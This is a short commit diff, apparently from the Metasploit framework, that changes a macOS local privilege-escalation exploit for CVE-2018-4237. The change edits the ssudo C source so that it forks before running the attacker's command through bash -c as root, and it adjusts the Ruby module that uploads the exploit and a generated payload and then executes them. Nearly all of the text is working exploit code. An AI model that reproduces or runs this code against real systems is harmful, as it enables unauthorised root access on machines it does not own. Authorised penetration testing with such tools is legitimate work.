fix forking

2018-11-20 15:58:55 +08:00 · 2018-11-20 15:58:55 +08:00 · 44b1b6fe31
parent 420be60900
commit 44b1b6fe31
3 changed files with 7 additions and 4 deletions
--- a/data/exploits/CVE-2018-4237/ssudo
+++ b/data/exploits/CVE-2018-4237/ssudo
--- a/external/source/exploits/CVE-2018-4237/ssudo/ssudo.c
+++ b/external/source/exploits/CVE-2018-4237/ssudo/ssudo.c
@ -249,9 +249,12 @@ int main(int argc, char** argv)
        // We are being executed by sudo. We now need to restore the original
        // bootstrap port and stdin fd and then execute the requested command
        restore_bootstrap_port();
-        dup2(STDOUT_FILENO, STDIN_FILENO);
-        dup2(STDERR_FILENO, STDOUT_FILENO);
-        return execl("/bin/bash", "/bin/bash", "-c", argv[1], NULL);
+        if (!fork()) {
+          dup2(STDOUT_FILENO, STDIN_FILENO);
+          dup2(STDERR_FILENO, STDOUT_FILENO);
+          return execl("/bin/bash", "/bin/bash", "-c", argv[1], NULL);
+        }
+        return 0;
    }

    // Copy command into one string suitable for "bash -c"
--- a/modules/exploits/osx/local/libxpc_mitm_ssudo.rb
+++ b/modules/exploits/osx/local/libxpc_mitm_ssudo.rb
@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
    upload_executable_file(exploit_file, exploit_data)
    payload_file = "#{datastore['WritableDir']}/#{Rex::Text::rand_text_alpha_lower(6..12)}"
    upload_executable_file(payload_file, generate_payload_exe)
-    exploit_cmd = "#{exploit_file} #{payload_file} &"
+    exploit_cmd = "#{exploit_file} #{payload_file}"
    print_status("Executing cmd '#{exploit_cmd}'")
    cmd_exec(exploit_cmd)
  end